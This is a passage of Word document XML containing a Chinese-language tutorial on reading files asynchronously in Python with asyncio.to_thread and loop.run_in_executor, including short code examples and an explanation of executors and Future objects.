    <w:p w14:paraId="26892A6F" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>async def read_file(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772DB58B" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    with open(file_path, 'r') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A91CE" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        data = await asyncio.to_thread(file.read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D84C7F" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    return data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB9AFA" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12751F72" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32441BDA" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    data = await read_file('my_file.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ED3FF3" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB519A" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36365265" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE45F0E" w14:textId="77777777" w:rsidR="00562012" w:rsidRPr="00562012" w:rsidRDefault="00562012" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACD4FB8" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并没有直接提供异步的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。这是因为在许多操作系统中，文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不是异步的，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能直接提供异步的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51780215" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F4B354" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068547C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>run_in_executor()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将</w:t>
      </w:r>
      <w:r w:rsidRPr="00732C62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00732C62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r w:rsidRPr="00732C62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>操作放在一个单独的线程中执行，从而不阻塞你的主事件循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。例如，以下是一个异步读取文件的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A50EA52" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3A0568" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE5AC6" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741D184C" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>async def read_file(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3A088F" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C670DA0" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    with open(file_path, 'r') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38826507" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>运行在默认的</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A9654" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        data = await loop.run_in_executor(None, file.read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D161E15" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    return data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548CF859" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F205DC0" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B96C69" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    data = await read_file('my_file.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F80D3EE" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F3EDC" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRPr="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572B38E4" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001D1C26">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30325ACC" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D20107" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">read_file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop.run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来在一个单独的线程中执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Future </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，所以可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来等待文件读取完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E36DF" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320BCDDF" w14:textId="77777777" w:rsidR="001D1C26" w:rsidRDefault="001D1C26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，如果你有大量的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，或者你的文件非常大，那么使用多线程或多进程可能会更有效。这是因为文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作通常是阻塞性的，如果你在主线程中执行大量的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，可能会阻塞你的程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F4C32" w14:textId="77777777" w:rsidR="00046EBE" w:rsidRDefault="00046EBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DBC1B2" w14:textId="2054A24E" w:rsidR="007215D1" w:rsidRDefault="005A08ED" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>细说</w:t>
      </w:r>
      <w:r>
        <w:t>loop.run_in_executor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7D88A" w14:textId="77777777" w:rsidR="005A08ED" w:rsidRDefault="005A08ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E31396" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">loop.run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库的一个函数，它可以将一个函数的执行委托给一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Executor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个线程池（默认）或者进程池，可以在后台执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU-bound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O-bound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的任务。通过这种方式，我们可以将一些耗时的、阻塞性的任务放在后台执行，避免阻塞事件循环。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69735481" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087DD22D" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个函数，它会读取文件的全部内容。因为读取文件是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O-bound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的操作，所以我们可以将它放在一个线程中执行，避免阻塞事件循环。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF4BEBE" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11467A49" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">loop.run_in_executor(None, file.read) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的执行委托给一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这个函数返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Future </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CDEE47" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123AF6A2" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">None </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示使用默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即线程池。如果你想使用自定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可以传递一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B145A59" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DAFCB2" w14:textId="77777777" w:rsidR="008460B4" w:rsidRDefault="008460B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字则是等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Future </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的结果。当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数执行完成，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
